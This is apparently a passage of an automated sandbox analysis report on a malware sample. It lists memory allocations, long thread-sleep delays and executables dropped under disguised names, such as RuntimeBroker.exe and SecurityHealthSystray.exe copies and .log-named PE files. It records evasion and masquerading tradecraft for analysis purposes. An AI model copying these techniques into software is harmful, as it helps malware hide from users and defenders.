                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1A610000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: F50000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1AC50000 memory reserve | memory write watch
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1080000 memory reserve | memory write watch
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1AE30000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: DC0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1ABA0000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1910000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1B390000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: C90000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1AA00000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: BF0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1AAA0000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1720000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeMemory allocated: 1B1F0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 2F00000 memory reserve | memory write watch
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeMemory allocated: 1B010000 memory reserve | memory write watch
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeCode function: 19_2_00007FFD9B8C8355 sldt word ptr [eax]19_2_00007FFD9B8C8355
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599890Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599781Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599671Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599562Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 599453Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 597229Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 597094Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596969Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596794Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 596617Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 600000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 599853
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 3600000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598907
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598203
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 598000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597563
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597344
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 597094
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596938
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596766
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596640
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596531
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596422
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596259
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 596107
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 300000
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595954
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595828
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595580
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595438
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595266
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595140
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 595014
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594906
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594797
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594688
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594563
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594438
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594313
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594198
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 594078
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593969
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593844
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593735
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593610
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593485
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593360
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593250
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 593141
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592985
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592846
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592719
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592610
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592485
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592375
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592266
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592157
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 592032
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591903
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591797
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591688
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591578
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591468
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591360
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591235
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 591110
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWindow / User API: threadDelayed 3866Jump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeWindow / User API: threadDelayed 1627Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4378
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 437
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4815
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4895
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3995
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4514
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 367
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWindow / User API: threadDelayed 4252
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeWindow / User API: threadDelayed 5368
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\hSShNgSi.logJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\yzZxaXSF.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\eSWSCFMK.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\NWsvAoLz.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\nweImycr.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\VRHDyDUj.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\quERYeDq.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\fAbTigaR.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\ekLJkSsv.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\wHsyCTFf.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\LionObPB.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\EkAnmMVM.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\rrfZteSl.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZpKsdnCB.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\GNRoGDmH.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\kdoiNyxj.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\QwkEqgro.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\HScOGmcH.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\BazpdGXT.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\DEgxfiAU.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\cnkBPSdA.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\ndjISZpy.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\JNNDResf.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\wexYWbhZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\NEEtYbtY.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\IhtNKAXm.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\WoNdSLwd.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeDropped PE file which has not been started: C:\Users\user\Desktop\oQGhqvNX.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\UMwcyUfj.logJump to dropped file
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeDropped PE file which has not been started: C:\Users\user\Desktop\BuKwfPUT.logJump to dropped file
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599890s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599781s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599671s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599562s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -599453s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99883s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99766s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99657s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99544s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99422s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99313s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99199s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -99084s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98954s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98829s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98704s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98579s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98454s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98329s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98204s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -98094s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -97954s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -597229s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -597094s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -596969s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -596794s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6944Thread sleep time: -596617s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 6280Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exe TID: 7048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 6296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 3192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 5752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 4378 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 437 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 4815 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7516Thread sleep count: 4895 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep count: 230 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep count: 3995 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep count: 4514 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 367 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 8056Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7176Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 3872Thread sleep time: -30000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -34126476536362649s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -600000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -599853s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7676Thread sleep time: -21600000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -598907s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -598203s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -598000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -597719s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -597563s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -597344s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -597094s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596938s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596766s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596640s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596531s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596422s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596259s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -596107s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7676Thread sleep time: -600000s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595954s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595828s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595719s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595580s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595438s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595266s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595140s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -595014s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594906s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594797s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594688s >= -30000s
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe TID: 7736Thread sleep time: -594563s >= -30000s
